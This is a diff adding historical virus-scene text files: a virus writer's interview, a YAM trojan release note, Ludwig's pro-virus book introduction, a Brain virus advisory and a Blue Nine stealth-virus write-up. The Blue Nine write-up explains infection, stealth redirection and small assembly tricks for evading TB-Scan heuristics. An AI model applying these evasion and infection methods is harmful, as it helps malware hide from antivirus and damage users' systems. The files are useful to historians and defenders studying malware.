smart enough to use a polymorphic engine... + the real virus writers wouldn't want to use code they haven't created + by themself atleast not to that extent... + +TU> What do you think about the new computer-laws propositions concerning + viruses? + +BL> ARGH! viruses shouldn't be illegal in ANY way... it's just a piece of + code or if you look at it in a different way some characters in a + file... well I'm not into laws... I don't think a community should have + any laws... I belive that everybody should use common sense to judge their + actions.. but that won't work in todays society... + +TU> Whats your opinion about the EU? + +BL> Well... too big... but as it looks Sweden would've had real big + problems if not being accepted... the EU-market is too large too miss + and swedish companies would've moved out of the country to get cheaper + labour and to get rid of all the taxes... aah well nothing is perfect, + is it? + +TU> Whats your opinion about the swedish government? + +BL> It sucks... the politicians are too weak and no one has the guts to do + anything about it... + +TU> Do you distribute your viruses to the public? + +BL> Haven't done that so far... + +TU> Which virus programmer do you admire/like? + +BL> I donno really... haven't had that much contact with _major_ virus + writers... but I like Qark's style, doing the flash bios infector, + because it has never been done before... Thats what I admire, + originality. + +TU> Describe the perfect virus: + +BL> Hard to do actually, one could say that it would be full stealth on + every aspect and infect floppy boot/mbr/com/exe/sys/ovl and so forth, but + tomorrow everything might change because of some new tool invented or + something... + +TU> Describe the perfect viruscoder: + +BL> Even harder... but the most important thing is time and a brain is + preferred... + +TU> Describe the AV-community in a few lines: + +BL> Since I haven't released any viruses to the public I haven't encountered + any _real_ AV'ers... but I've followed some discussions at anti-virus + meetings and most of the AV'ers are simply morons... and they like + flaming so I guess I don't like 'em. + +TU> Which AV-program do you think is the best? + +BL> Tbav is probably the best if you know viruses, but Fprot is a close + second... For people not knowing so much about viruses I recommend + Mc Affee's scan since it doesn't give you any false alarms... + +TU> Do you think an AV-program can guarantee 100% detection rate + for all known & unknown viruses? + +BL> No, not without hardware protection. If it's software there will + always be way around it or a backdoor or a bug wich one could use to + by-pass it... + +TU> Bontchev wrote an article called "Future trends in viruswriting", to + you think viruses described will be coded in the future? + + (Lan aware viruses, snatching passwords, etc.) + +BL> Believe me, there are already viruses like that around! + +TU> (Anti-virus-virus - (retrovirus)) + +BL> If you mean that virus writers will attack other viruses, then I guess + I think that won't be so likely... maybe co-existing but not nukeing + others... + + (* Stupid goof, retro-viruses do attack AV-software - TU :) *) + + (maybe if you had wrote it "Anti-Anti_virus-virus" he would of got + it right ;) , looks like you both made a mistake ;)) (yep, you guessed + right: another obnoxious remark from rb :)) + +TU> (self-mutating viruses) + +BL> This is probebly very likely to be a project for someone, but it would + be DAMN hard to do... if not entirely impossible... probably impossible + actually. + +TU> (Hardware level stealth - like Strange) + +BL> mmm I don't know shit about Strange... but I guess writers all over + will try to find better ways of stealthing, so thats more than likely + to produce more complicated stealth-methods. + +TU> What to you think about the future for PC-DOS viruses? + +BL> The dos-virus probably still has a future because it'll be hard to + kill the dos environment... some people say that dos will die with + win95. I don't belive in that, maybe because I'll never change to a + GUI (* Grafical User Interface - TU *) but because win95 has enormous + hardware requirements that many pc-users won't match so atleast + they'll stay a while in a plain dos environment... + +TU> Do you think viruses will be written for other (newer) operating- + systems like OS/2 and Win95? + +BL> Yes probably... but not in pure-asm, as I see it it'll be the era of + high-level viruses... I also think it'll be another generation of virus + writers because most of todays writers are pure-asm coders and they + won't like the thought of writing viruses in C or Pascal or something + like it... + +TU> Have you ever considered writing a virus for another OS than DOS? + +BL> Considered, yes... tried, no... my knowledge of other OS's are far to + basic... and I don't even feel like it would be worth a try.. dos is + still the main pc-environment + +TU> Any advice to people who want's to learn the basic of virus-writing? + +BL> Yeah... get hold of some sources... ;) naah honestly sources are good, + but it's even better to get hold of a virus programmer and have him + explain a source. That usually helps ALOT... I'll help everyone I + can... and I know most writers feel the same... as long as it isn't + REALLY stupid questions... also looking at some tutes is useful. DA's + (* Dark Angel/Phalcon/Skism - TU *) guides help me out a lot... maybe + not the code, but the concept. + +TU> Do you think the virus-problem will slow down bcos of laws? + +BL> NO, probably just the opposite atleast it would work like that for + me... I know I can keep my real name hidden if I wanted to and I + disagree with laws like that so it would make me very productive and + also very destructive... + +TU> Can you be reached somewhere? + +BL> I can always be reached at TWL/HNS (+46-8-7354760). I'm working on a + real internet account..... + +TU> Your mottoe is: + +BL> nada... seize the day is a good one, but that is taken by someone.. ;) + (* Who?? Horatius? :) *) + +TU> Something else you wish to say but never before had to opportunity + to say? + +BL> Hi mom...;) and well mmm erh... + +TU> Do you wish to send any greet/hate messages? + +BL> yup... a big thank you to Anders Gavare, Swedens numero uno + av-wanna-be and also the guy that keeps me writing viruses ;) + Without his attitude I wouldn't be alive since a laughter extends your + life... (^Swedish expression.. ;)) + + else mmm well thanks to all the people on IRC that has helped me out + or tried to help me out... especially darkman/vlad for a helping me + with a fprot alarm. + diff --git a/textfiles.com/virus/bedtime.nfo b/textfiles.com/virus/bedtime.nfo new file mode 100644 index 00000000..82b47317 --- /dev/null +++ b/textfiles.com/virus/bedtime.nfo @@ -0,0 +1,58 @@ + + + + + + + + + + + + + + + + + +ķ + / A Youngsters Against McAfee Production \ +Ľ +ķ + DISCLAIMER : By unzipping this file you hearby agree that YAM is not + responsible for any damage that it does to your computer or anybody's + else's computer. We are also not responsible for what you or anyone else + does with the files included, be it running it on someone else's computer + or by running it on your own computer. (If your dumb enough too) +Ľ +ķ + / Executable Information \ +Ķ + Virus / Trojan Name : The Bed Time Virus + Author / Modification By : Admiral Bailey (Author) + Language Used : Assembly Language [TASM 2.0] + Type of Virus / Trojan : Memory Resident .COM Infector + Date Of Release : 11-16-92 +Ķ + Some Notes: + Well another release. My 4th in 4-5 days. This time its a Memory + resident .COM infector. Like before I only encrypted The messeges. They + change also. This is my first time at a ressy so don't laugh. Just enjoy + If you wanna know what this does then feel free to disassemble it. I don't + care. Well see you next time. BTW its disguised as a font editing program + so just remember to remove this before uploading to any lame PD boards. + + Don't forget to check out some of my latest releases: + Totally Whacked Out Virus Writer's Manual Parts I & II + The Stinking Butt Virus (What a name?!) +Ķ + Look for Evolution 2. Comming soon to a board near you. + Call The Full Moon [YAM WHQ] for all the latest YAM releases. + If you think your good enough why don't you call the YAM WHQ and apply + to be a YAM member today. Basic requirements are a knowledge of + assembly, virii and how they work. +Ķ +If you like this virus then support the author by letting them know. A small + piece of E-Mail can go a long way in a future release. +Ľ + diff --git a/textfiles.com/virus/blckbook.txt b/textfiles.com/virus/blckbook.txt new file mode 100644 index 00000000..6c76cdaf --- /dev/null +++ b/textfiles.com/virus/blckbook.txt @@ -0,0 +1,483 @@ +--- + +WARNING: This book contains complete source code for live +computer viruses which could be extremely dangerous in the hands +of incompetent persons. You can be held legally liable for the +misuse of these viruses, even if such misuse is unintentional. Do +not attempt to execute any of the code in this book unless you +are well versed in systems programming for personal computers, +and you are working on a carefully controlled and isolated +computer system. + +--- + + The Little Black Book Of Computer Viruses + + Volume One: + + The Basic Technology + + By Mark A. Ludwig + + American Eagle Publications, Inc. + Post Office Box 41401 + Tucson, Arizona 85717 + - 1991 - + + And God saw that it was good, + And God blessed them, saying + "Be fruitful and multiply." + + Genesis 1:21,22 + + + + + + +============ +INTRODUCTION +============ + + + This is the first part in a series of three books about +computer viruses. In these volumes, I want to challenge you to +think in new ways about viruses, and break down false concepts +and wrong ways of thinking, and go on from there to discuss the +relevance of the computer viruses in today's world. These books +are not a call to a witch hunt, or manuals for protecting +yourself from viruses. On the contrary, they will teach you how +to design viruses, deploy them, and make them better. All three +volumes are full of source code for viruses, including both new +and well known varieties. + + It is inevitable that these books will offend some people. +In fact, I hope they do. They need to. I am convinced that +computer viruses are not evil and that programmers have the right +to create them, posses them and experiment with them. That kind +of a stand is going to offend a lot of people, no matter how it +is presented. Even a purely technical treatment of viruses which +simply discussed how to write them and provided some examples +would be offensive. The mere thought of a million well armed +hackers out there is enough to drive some bureaucrats mad. These +books go beyond a technical treatment, though, to defend the idea +that viruses can be useful, interesting, and just plain fun. That +is bound to prove even more offensive. Still, the truth is the +truth, and it needs to be spoken, even if it is offensive. Morals +and ethics cannot be determined by a majority vote, any more than +they can be determined by the barrel of a gun or loud mouth. +Might does not make right. + + If you turn out to be one of those people who gets offended +or upset, or if you find yourself violently disagreeing with +something I say, just remember what an athletically minded friend +of mine once told me: "No pain, no gain." That was in reference +to muscle building, but the principle applies intellectually as +well as physically. If someone only listens to people he agrees +with, he will never grow and he'll never succeed beyond his +little circle of yes-men. On the other hand, a person who listens +to different ideas at the risk of offense, and who at least +considers that he might be wrong, cannot but gain from it. So if +you are offended by something in this book, please be critical - +both of the book and of yourself- and don't fall into a rut and +let someone else tell you how to think. + + From the start I want to stress that I do not advocate +anyone's going out and infecting an innocent party's computer +system with a malicious virus designed to destroy valuable data +or bring their system to a halt. That is not only wrong, it is +illegal. If you do that, you could wind up in jail or find +yourself being sued for millions. However, this doesn't mean that +it is illegal to create a computer virus and experiment with it, +even though I know some people wish it was. If you do create a +virus, though, be careful with it. Make sure you know it is +working properly or you may wipe out your own system by accident. +And make sure you don't inadvertently release it into the world, +or you may find yourself in a legal jam... Even if it was just an +accident. The guy who loses a year's worth of work may not be so +convinced that it was an accident. And soon, it may be illegal to +infect a computer system (even your own) with a benign virus +which does no harm at all. The key word here is responsability. +Be responsible. If you do something destructive, be prepared to +take responsability. "The program included in this book could be +dangerous if improperly used. Treat them with the respect you +would have for a lethal weapon." + + This first of three volumes is a technical introduction to +the basics of writing computer viruses. It discusses what a virus +is and how it does its job, going into the major functional +components of the virus, step by step. Several different types of +viruses are developed from the ground up, giving the reader +practical how-to information for writing viruses. That is also a +prerequisite for decoding and understanding any viruses one may +run across in his day to day computing. Many people think of +viruses as sort of a black art. The purpose of this volume is to +bring them out of the closet and look at them matter-of-factly, +to see them for what they are, technically speaking: computer +programs. + + The second volume discusses the scientific applications of +computer viruses. There is a whole new field of scientific study +known as artificial life (AL) research which is opening up as a +result of the invention of viruses and related entities. Since +computer viruses are functionally similar to living organisms, +biology can teach us a lot about them, both how they behave and +how to make them better. However, computer viruses also have the +potential to teach us something about living organisms. We can +create and control computer viruses in a way that we cannot yet +control living organisms. This allows us to look at life +abstractly to learn about what it really is. We may even reflect +on such great questions as the beginning and subsequent evolution +of life. + + The third volume of this series discusses military +applications for computer viruses. It is well known that computer +viruses can be extremly destructive, and that they can be +deployed with minimal risk. Military organizations throughout the +world know that too, and consider the possibility of viral attack +both a very real threat and very real offensive option. Some high +level officials in various countries already believe their +computers have been attacked for political reasons. So the third +volume will probe military strategies and real-life attacks, and +dig into the development of viral weapon systems, defeating anti- +viral defenses, etc. + + You might be wondering at this point why you should spend +time studying these volumes. After all, computer viruses +apparently have no commercial value apart from their military +applications. Learning how to write them may not make you more +employable, or give you new techniques to incorporate into +programs. So why waste time with them, unless you need then to +sow chaos among your ennemies? Let me try to answer that: Ever +since computers were invented in the 1940's, there has been a +brotherhood of people dedicated to exploring the limitless +possibilities of these magnificent machines. This brotherhood has +included famous mathematicians and scientists, as well as +thousands of unnamed hobbyists who built their own computers, and +programmers who love to dig into the heart of their machines. As +long as computers have been around, men have dreamed of +intelligent machines which would reason, and act without being +told step by step just what to do. For many years this was purely +science fiction. However, the very thought of this possibility +drive some to attempt to make it a reality. This "artificial +intelligence" was born. Yet AI applications are often driven by +commercial interests, and tend to be colored by the fact. Typical +results are knowledge bases and the like - useful, sometimes +exciting, but also geared toward putting the machine to use in a +specific way, rather that to exploring it on its own terms. + + The computer virus is a radical new approach to this idea of +"living machines." Rather that trying to design something which +poorly mimics highly complex human behavior, one starts by trying +to copy the simplest of living organisms. Simple one-celled +organisms don't do very much. The most primitive organisms draw +nutrients from the sea in the form of inorganic chemicals, and +take energy from the sun, and their only goal is apparently to +survive and to reproduce. They aren't very intelligent, and it +would be tough to argue about their metaphysical aspects like +"soul." Yet they do what they were programmed to do, and they do +it very effectively. If we were to try to mimic such organisms by +building a machine - a little robot - which went around +collecting raw materials and putting them together to make +another robot, we would have a very difficult task on our hands. +On the other hand, think of a whole new universe - not this +physical world, but an electronic one, which exists inside of a +computer. Here is the virus' world. Here it can "live" in a sense +not too diffrentt from that of primitive biological life. The +computer virus has the same goal as a living organism - to +survive and to reproduce. It has environmental obstacles to +overcome, which could "kill" it and render it inoperative. And +once it is released, it seems to have a mind of its own. It runs +off in its electronic world doing what it was programmed to do. +In this sense it is very much alive. + + There is no doubt that the beginning of the life was an +important milestone in the history of the earth. However, if one +tries to consider it from the viewpoint of inanimate matter, it +is difficult to imagine life as being much more than a nuisance. +We usually assume that life is good and that it deserves to be +protected. However, one cannot take a step further back and see +life as somehow beneficial to the inanimate world. If we consider +only the atoms of the universe, what difference does it make if +the temperature is seventy degrees farenheit or twenty million? +What difference would it make if the earth were covered with +radioactive materials? None at all. Whenever we talk about the +environment and ecology, we always assume that life is good and +that it should be nurtured and preserved. Living organisms +universally use the inanimate world with little concern for it, +from the smallest cell which freely gathers the nutrients it +needs and pollutes the water it swims in, right up to the man who +crushes up rocks to refine the metals out of them and build +airplanes. Living organisms use the material world as they see +fit. Even when people get upset about something like strip +mining, or an oil spill, their point of reference is not that of +inanimate nature. It is an entirely selfish concept (with respect +to life) that motivates them. The mining mars the beauty of the +landscape - a beauty which is in the eye of the (living) beholder +- and it makes it unhabitable. If one did not place a special +emphasis on life, one could just as well promote strip mining as +an attempt to return the earth to its pre-biotic state! + + I say all of this not because I have a bone to pick with +ecologists. Rather I want to apply the same reasoning to the +world of computer viruses. As long as one uses only financial +criteria to evaluate the worth of a computer program, viruses can +only be seen as a menace. What do they do besides damage valuable +programs and data? They are ruthless in attempting to gain access +to the computer system resources, and often the more ruthless +they are, the more successful. Yet how does that differ from +biological life? If a clump of moss can attack a rock to get some +sunshine and grow, it will do so ruthlessly. We call that +beautiful. So how different is that a computer virus attaching +itself to a program? If all one is concerned about is the +preservation of inanimate objects (which are ordinary programs) +in this electronic world, then of course viruses are a nuisance. + + But maybe there is something deeper here. That all depends +on what is most important to you, though. It seems that modern +culture has degenerated to the point where most men have no +higher goals in life than to seek their own personal peace and +prosperity. By personal peace, I do not mean freedom from war, +but a freedom to think and believe whatever you want without ever +being challenged in it. More bluntly, the freedom to live in a +fantasy world of your own making. By property, I mean simply an +ever increasing abundance of material possessions. Karl Marx +looked at all of mankind and said that the motivating force +behind every man is his economic well being. The result, he said, +is that all of history can be interpreted in terms of class +struggles - people fighting for economic control. Even though +many in our government decry Marx as the father of communism, our +nation is trying to squeeze itself into the straight jacket he +has laid for us. That is why two of George Bush most important +campaign promises were "four more years of prosperity" and "no +new taxes." People vote for their wallets, even when they know +the politicians are lying through their teeth. + + In a society with such values, the computer becomes merely a +resource which people use to harness an abundance of information +and manipulate it to their advantage. If that is all there is to +computers, then computer viruses are a nuisance, and they should +be eliminated. Surely there must be some nobler purpose for +mankind than to make money, though, even though that may be +necessary. Marx may not think so. The government may not think +so. And a lot of loud-mouthed people may not think so. Yet great +men from every age and every nation testify to the truth that man +does have a higher purpose. Should we not be as Socrates, who +consider himself ignorant, and who sought Truth and Wisdom, and +valued them more highly than silver and gold? And if so, the +question that really matters is not how computers can make us +wealthy or give us power over others, but how they might make us +"wise". What can we learn about ourselves? About our world and, +yes, maybe even about God? Once we focus on that, computer +viruses become very interesting. Might we not understand life a +little better if we can create something similar, and study it, +and try to understand it? And if we understand life better, will +we not understand our lives, and our world better as well? + + + A word of caution first: Centuries ago, our nation was +etablished on philosophical principles of good government, which +were embodied in the Declaration of Independence and +Constitution. As personal peace and prosperity have become more +important than principles of good government, the principles have +been manipulated and redefined to suit the whims of those who are +in power. Government has become less and less sensitive to civil +rights, while it has become easy for various political and +financial interests to manipulate our leaders to their adventage. + + Since people have largely ceased to challenge each other in +what they believe, accepting instead the idea that whatever you +want to believe is OK, the government can no longer get people to +obey the law because everyone believes in a certain set of +principles upon which the law is founded. Thus, government must +coerce people into obeying it with increasingly harsh penalities +for disobedience - penalities which often fly in the face of long +established civil rights. Furthermore, the government must +restrict the average man's ability to seek recourse. For example, +it is very common for the government to trample all over long- +standing constitutional rights when enforcing the tax code. The +IRS routinely forces hundreds of thousands of people to testify +against themselves. It routinely puts the burden of proof on the +accused, seizes his assets without trial, etc., etc. The bottom +line is that it is not expedient for the government to collect +money from its citizens if it has to proove their tax documents +wrong. The whole system would break down in a massive overload. +Economically speaking, it is just better to put the burden of +proof on the citizen, Bill of Rights or no. + + Likewise, to challenge the government on a question of +rights is practically impossible, unless your case happens to +serve the purposes of some powerful special interest group. In a +standard courtroom, one often cannot even bring up the subject of +constitutional rights. The only question to be argued is whether +or not some particular law was broken. To appeal to the Supreme +Court will cost millions, if the politically motivated justices +will even condescend to hear to case. So the government becomes +pratically all-powerful, God walking on earth, to the common man. +One man seems to have little recourse but to blindy obey those in +power. + + + When we start talking about computer viruses, we're treading +on some ground that certain people want to post a "No Trepassing" +sign on. The congress of the United States has considered a +"Computer Virus Eradication Act" which would make it a felony to +write a virus, or for two willing parties to exchange one. Never +mind that the constitution garantees freedom of speech and +freedom of the press. Never mind that it garantees the citizens +the right to bear military arms (and viruses might be so +classified). While that law has not passed as of this writing, it +may by the time you read this book. If so, I will say without +hesitation that it is a miserable tyranny, but one that we can do +little about... for now. + + Some of our leaders may argue that many people are not +capable of handling the responsability of power that comes with +understanding computer viruses, just as they argue that people +are not able to handle the power of owning assault rifles or +machine guns. Perhaps some cannot. But I wonder, are our leaders +any better able to handle the much more dangerous weapons of law +and limitless might? Obviously they think so, since they are busy +trying to centralize all power into their own hands. I disagree. +If those in government can handle power, then so can the +individual. If the individual cannot, then neither can his +representatives, and our end is either tyranny or chaos anyhow. +So there is no harm in attempting to restore some small power to +the individual. + + But remember: truth seekers and wise men have been +persecuted by powerful idiots in every age. Although computer +viruses may be very interesting and worthwhile, those who take an +interest in them may face some serious challenges from base men. +So be careful. + + Now join with me and take the attitude of early scientists. +These explorers wanted to understand how the world worked - and +whether it could be turned to a profit mattered little. They were +trying to become wiser in what's really important by +understanding the world a little better. After all, what value +could there be in building a telescope so you could see the moons +around Jupiter? Galileo must have seen something in it, and it +must have meant enough to him to stand up to the ruling +authorities of his day and do it, and talk about it, and +encourage others to do it. And to land in prison for it. Today +some people are glad he did. + + So why not take the same attitude when it comes to creating +life on a computer? One has to wonder where it might lead. Could +there be a whole new world of electronic life forms possible, of +which computer viruses are only the most rudimentary sort? +Perhaps, they are the electronic analog of the simplest one- +celled creatures, which were only the tiny beginning on life on +earth. What would be the electronic equivalent of a flower, or a +dog? Where could it lead? The possibilities could be as exciting +as the idea of a man actually standing on the moon would have +been to Galileo. We just have no idea. + + There is something in certain men that simply drives them to +explore the unknown. When standing at the edge of a vast ocean +upon which no ship ever sailed, it is difficult not to wonder +what lies beyond the horizon just because the rules of the day +tell you you're going to fall of the edge of the world (or +they're going to push you off) if you try to find out. Perhaps +they are right. Perhaps there is no value out there. Yet great +explorers down trough the ages have explored other oceans and +succeeded. And one thing is for sure: we'll never know if someone +doesn't look. So I would like to invite you to climb aboard the +little mast that I have built and go exploring... +--- + Bibliography on Viruses. + +The following is a list of books on the subject of computer +viruses and virus-related topics that I have accumulated over the +years. It is not meant to be all-inclusive or a complete guide +on the subject and inclusion here is not to be concluded as being +an endorsement of any sort. + +Aryeh Goretsky TEL: (408) 988-3832 +Mgr, Tech Support Dept FAX: (408) 970-9727 +McAfee Associates, Inc. BBS: (408) 988-3832 +3350 Scott Blvd, Bldg 14 CIS: 76702,1714 Santa +Clara, CA 95054-3107 Internet: +aryehg@mcafee.COM +_________________________________________________________________ + +Burger, Ralf. COMPUTER VIRUSES: A HIGH-TECH DISEASE, 3rd Ed. +Abacus Press, Grand Rapids, MI: 1989. 276pp + +______, ____. COMPUTER VIRUSES AND DATA PROTECTION. Abacus +Press, Grand Rapids, MI: 1991. 353pp + +Denning, Peter J., Ed. COMPUTERS UNDER ATTACK: INTRUDERS, WORMS +AND VIRUSES, ACM PRESS: 1990. 554pp + +Ferreyra Cortes, Gonzalo. VIRUS EN LAS COMPUTADORAS (in Spanish), +Macrobit, Miami, FL: 1990. + +Fites, Philip, Peter Johnston, and Martin Kratz. COMPUTER VIRUS +CRISIS, THE, Van Nostrand Reinhold, NY: 1989. 171pp + +Haynes, Colin. THE COMPUTER VIRUS PROTECTION HANDBOOK, Sybex, +Alameda, CA: 1990. 192pp + +Hoffman, Lance J, Ed. ROGUE PROGRAMS: VIRUSES, WORMS, AND TROJAN +HORSES, Van Nostrand Reinhold, NY: 1990. 384pp + +Hruska, Jan. COMPUTER VIRUSES AND ANTI-VIRUS WARFARE. Ellis +Horwood, Ltd., West Sussex, UK: 1990. 128pp + +Jacobson, Robert V. THE PC VIRUS CONTROL HANDBOOK, 2nd Edition, +Miller Freeman Publications, NY: 1990. 162pp + +________, ________. USING McAFEE ASSOCIATES SOFTWARE FOR SAFE +COMPUTING. International Security Technology, NY: 1992. 143pp + +Jarvinen, Petteri. TIETOKONE VIRUKSET (in Finnish), Werner +Soderstrom Osakeyhtio, Helsinki: 1990. 226pp + +Javeri, Harsh, and Suchit Nanda. WAR ON VIRUS, The Computer Book +Shop, Bombay: 1990. 292pp + +Lundell, Allan. VIRUS! THE SECRET WORLD OF COMPUTER INVADERS THAT +BREED AND DESTROY. Contemporary Books, Chicago: 1989. 189pp + +McAfee, John, and Colin Haynes. COMPUTER VIRUSES, WORMS, DATA +DIDDLERS, KILLER PROGRAMS AND OTHER THREATS TO YOUR SYSTEM. St +Martins, NY: 1988. 235pp + +The following books, while not specifically about computer +viruses, contain information that may be of interest: + +Baker, Richard H. COMPUTER SECURITY HANDBOOK, 2nd Ed. TAB Books, +Blue Ridge Summit, PA: 1991. 416pp + +DeMaio, Harry B. INFORMATION PROTECTION AND OTHER UNNATURAL +ACTS., AMACOM, New York: 1992. 232pp + +Forester, Tom, and Perry Morrison. COMPUTER ETHICS: CAUTIONARY +TALES AND ETHICAL DILEMMAS IN COMPUTING. MIT Press, Cambridge: +1990. 193pp + +Jennings, Karla. THE DEVOURING FUNGUS: TALES OF THE COMPUTER AGE, +WW Norton & Co., NY: 1990. 237pp + +Mueller, Scott. QUE'S GUIDE TO DATA RECOVERY. QUE Corporation, +Carmel, IN: 498pp + +National Research Council. COMPUTERS AT RISK: SAFE COMPUTING IN +THE INFORMATION AGE. National Academy Press, Washington DC: 1991. +303pp + +Raymond, Eric, Ed. THE NEW HACKERS DICTIONARY., MIT Press, +Cambridge: 1991. 433pp + +Rothman, David H. THE COMPLETE LAPTOP COMPUTER GUIDE, St Martins, +NY: 1990. 384pp + +Sawicki, Ed. LAN DESKTOP GUIDE TO SECURITY, SAMS, Carmel, IN: +1992. 349pp + +Wilson, Ralph. HELP! THE ART OF COMPUTER TECHNICAL SUPPORT, +Peachpit Press, Berkeley: 1991. 231pp + +================================================================= diff --git a/textfiles.com/virus/bluenine.nfo b/textfiles.com/virus/bluenine.nfo new file mode 100644 index 00000000..787d91c7 --- /dev/null +++ b/textfiles.com/virus/bluenine.nfo @@ -0,0 +1,205 @@ +% Blue Nine % + +Here is Conzouler's contribution to IR6. First, the textfile, then the +source code. Blue Nine is by the a poison used in the book Neuromancer, +which seem to has inspired quite a few viruswriters. Ah, just in case +you wondered - TU + + + A technical discussion about the Blue Nine virus + Written by: Conzouler. + (Terribly serious :-) + + + The Blue Nine virus was born on 19:th of November 1994. +It has about the same features as the Cybernetic Eel which I wrote this +summer but the code is much better and it doesn't disinfect files but +does instead redirect any reads from the infected areas of an infected +file, this method is, quite naturally, called redirection. It also makes +use of another infection engine, putting itself in the end of the +infected files. + + This version does not have any payloads, it just reproduces and hides +itself. But we are working on a Novell password stealer to add, hence +the redirection, it will work on write protected network drives and +disks too. We have some betas with a disk/file trasher and a joke on +the 25:th of any month, but they aren't distributed. + + Well, that was a brief description of it, now I will go in to +the details. + + First of all, when a program is executed it performs an installation +check and checks the dos version by setting cx to 666 and issuing get dos +version (int 21/ah=30). If the virus already is resident it will change cx +to 444 and the virus will just restore the host program in memory and jump +back to the entry point. If cx not equals 444 then the virus will check if +the dos version is higher 3.30 and, if so, go resident. + + If the installation checks fails the go resident routine will attempt to +allocate memory for the virus. First of all it has to deallocate some of +the memory allocated to the host program. This is done by moving the word at +cs-1:[3] to bx, subtracting the virus size from bx and issuing int21/ah=4A. + Then it uses the int 21/ah=48 to allocate memory to itself. When the +memory has been allocated the virus has to determine its entry point +(the delta offset). To do that it fetches the word at cs:[101] which is +the address of the jmp instruction that jumps to the virus entry point. +Using this offset it sets ds:si to the start of the virus and es:di to +the beginning of the newly allocated memory. Cx is set to the size of +the virus, thus preparing for a rep movsb which will put the virus in +its own allocated memory block. + + The rep movsb instruction is replaced by the following code: + +label: lodsb + stosb + loop label + +This is exactly the same as rep movsb except that it destroys al and +that TB-Scan cannot find it. That means that TB-Scan does NOT emulate as +Venkmann says or possibly that the emulator is awfully bad. But that +doesn't matter, let's go on.. + + The virus will then jump to the int 21 hooking routine in the new +block by subtracting the segment address by 10h to compensate for the +PSP that is missing in the new block. This address and the offset of the +hooking routine are pushed and a retf will jump to the new block. + + The next step is to hook int 21. This is done using the normal dos +method, not by directly change the vectors. First it calls int 21/ax=3521 +to get the original vector. It then calls int 21/ax=2521 to put itself +in the vector. + + And now there is only one step left. It has to restore the host +program. Since the original first 3 bytes of the host are saved right +before the entry point (at offset 103 in our new block) it moves them to +offset 100h of the host and jumps there using a retf construction +similar to the one mentioned above. + + At this point the host program is running as usual, totally unaware of +the Blue Nine hiding in the dark, just waiting for an opportunity to +infect another unsuspicious program... + + The virus will infect any .com file that is run after the virus has +gone resident. It will also infect .com files in a dir listing on a +random basis (25% chance). + The infection is simple and effective. The virus opens its victim, +reads the first three bytes, searches to eof, appends itself and creates +a jump construct at the beginning of the file pointing to the start of +the virus. + + An infected file would look like this: + Ŀ + E9 xx xx <-- A jump to the virus entry point + Ĵ + Host <-- The original program except for the + program first three bytes. + .... + Ĵ + xx xx xx <-- The first three bytes of the original program + Ĵ + Virus <-- Guess what... + code... + + + + Now we have only the fun left, stealth... + + Size stealth: +After a successful find first/next using fcbs (ah=11/12) the fcbfind +routine will be called from the int 21 handler. First it filters out all +other files but those with extension .com. It then checks if the seconds +of the time field are set to 4, and if that is the case it will decrease +the size field with the virus size and return to dos. + If it is a .com file but the seconds don't match and the lowest 2 bits +of port 41 is zero (25% chance, 41 is the timer) then the filename will +be converted to a nul terminated ascii string, opened and sent to the +infection routine. + This will work on a dir command since Bill Gates is fucked up and +uses fcbs instead of handles as recommended since dos 2.11. + Since other programs like Norton uses handles I've added a similar +function for the calls 4E/4F (find first/next using handles) but I +haven't bothered doing an infection therein. + + Redirection, the innovation in this virus... + + The state of the art technique for avoiding checksummers and +self-checkers has been disinfection. Disinfection works very fine and +isn't too slow but it has one (minor) disadvantage, it doesn't work on +write protected disks and it doesn't work in networks where the file +are more likely to be write protected. + + The solution that I've created to this problem is, like boot-sector +viruses, to redirect all reads from an infected area of a file. + When an infected file is opened using dos function 3D (open) or +6C00 (extended open) the virus will use the internal dos call +int 2F/ax=1220 which converts a handle to a number for an entry in +the system file tables (sft), this number is then converted to an address +to the specific sft for that file using int 2F/ax=1226. You can see +exactly how this is done in the getsft routine in the virus code. + The 14:th bit in the 5:th word from this address is set, marking +that the file's date/time should not be set on closing. The original +first three bytes of the file are read into the date/time field at +offset 0D in the sft and the last byte of the date/time field is set to +31 marking that the file is to be redirected. Then the size dword at +offset 11 in the sft is decreased by the size of the virus and the virus +returns to the caller. + Whenever this file is being read the virus +will catch the 3F (read from file) call and if the offset is within the +first 3 bytes of the file those will be replaced by those saved in the +date/time field. + The only catch with the redirection is that a file could be destroyed +if something (another virus for example) appends to the file. The simple +solution to this problem is to disinfect a file if a write is +attempted. + + All interrupt, calls and data structures referred to in this article +can be found in Ralph Brown's interrupt list. The sft and the memory +control block are described under the dos call get list of lists (int +21/ah=52), a cookie. The int 2F/1220/1226 calls are described in +separate entries in the interrupt list. + + Now I'm going to tell you about the TB-Fooling tricks in the Blue Nine + virus. + +* The int 21/ax=2521 call will set the Memory resident flag. + Just set ax to 2125 and perform an xchg ah,al instruction. + +* The rep movsb will set the Relocation flag, just do as described + above. + +* Any write (int 21/40) will set the suspicious File access flag. + You can use this code: + mov ah, 40h xor 39 (or whatever) + xor ah, 39 + int 21h + +* The described 2F functions will also set the F flag. + The same code works even here: + mov ax, 1220h xor 4321 + xor ax, 4321 + int 21h + +* A read at cs:[101] will set the Delta offset flag, this can be avoided + by pushing this word and pop it into a register. + +* A compare with 'MZ' will cause the Z flag (exe/com determination). + Just xor both 'MZ' and the word you are checking with the same number + or xchg the word and compare it with 'ZM' instead. + +* A push of 100h followed by ret or retf will set the Back to entry point + flag. Remove by moving 100 to ax and pushing ax instead. + +The general method for removing a TB flag is to confuse the code a bit, +xor:ing, xchg:ing, pushing/poping all works fine, just try a few times. +If you cant guess where in the code a flag is you can use ';' to exclude +pieces of code and see if the flag disappears, just remember that a flag +can be in more than one position. + + That's all for this time folks... + ...until next time I may have done some multipartitite... + ...or maybe I'm just too lazy... + - Cya - + + - Conzouler - + + diff --git a/textfiles.com/virus/braininf.vir b/textfiles.com/virus/braininf.vir new file mode 100644 index 00000000..a31bcc2c --- /dev/null +++ b/textfiles.com/virus/braininf.vir @@ -0,0 +1,146 @@ +Information on the Brain Virus And Variants +Prepared by David Stang +National Computer Security Association +Suite 309, 4401-A Connecticut Avenue NW +Washington, DC 20008 +(202) 364-8252 (voice) +(202) 364-1304 (BBS) +This material (c) 1989 NCSA. It may not be reproduced +without attribution to the NCSA. + +Synonyms: Pakistani Brain, Basit Virus. + +This virus originated in January, 1986, in Lahore +Pakistan, but the first noticeable infection problems +did not surface until 1988. In the spring of 1988, for +instance, 100 machines at The Providence Journal-Bulletin +were infected with it. + +The Brain is the only virus yet discovered that +includes the valid names address and phone numbers of +the original perpetrators. It was written by two +brothers running a computer store in Lahore Pakistan. +According to some sources, Basit Farooq Alvi, one 